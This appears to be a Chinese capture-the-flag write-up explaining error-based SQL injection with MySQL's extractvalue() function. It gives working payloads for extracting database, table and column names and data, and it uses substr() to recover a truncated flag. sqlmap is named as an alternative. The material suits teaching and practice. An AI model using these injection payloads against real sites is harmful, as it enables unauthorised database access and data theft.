知识储备
extractvalue()函数:在无法进行联合查询时我们可以用extractvalue()函数来进行报错查询。
查数据库名:?id=1' and extractvalue(1,concat(0x7e,database()))#
爆表名: ?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))#
爆字段名:?id=1'and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="表名")))#
爆数据:id=1'and extractvalue(1,concat(0x7e,(select 字段名 from 表名)))#
注:extractvalue()的回显只有32位。
substr(string,m,n)函数: 对于内容string读取从m位置开始长度为n的内容。
渗透测试工具sqlmap的使用。
开始做题
试出回显数是3
发现无法进行联合查询,我们尝试报错查询。
得到库名test_db, 我们继续爆破表名。
得到表名test_tb, users 我们继续爆test_tb中的字段名。
得到字段名id, flag 我们开始爆flag中的数据。
我们发现由于extractvalue()只能回显32位所以我们得到的flag不全。我们使用substr()函数继续查询后面的内容。
从20位继续向后偏移30位得到后半段flag,拼一下得出完整的flag。
或
这道题我们还可以用渗透测试工具sqlmap来解决。
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
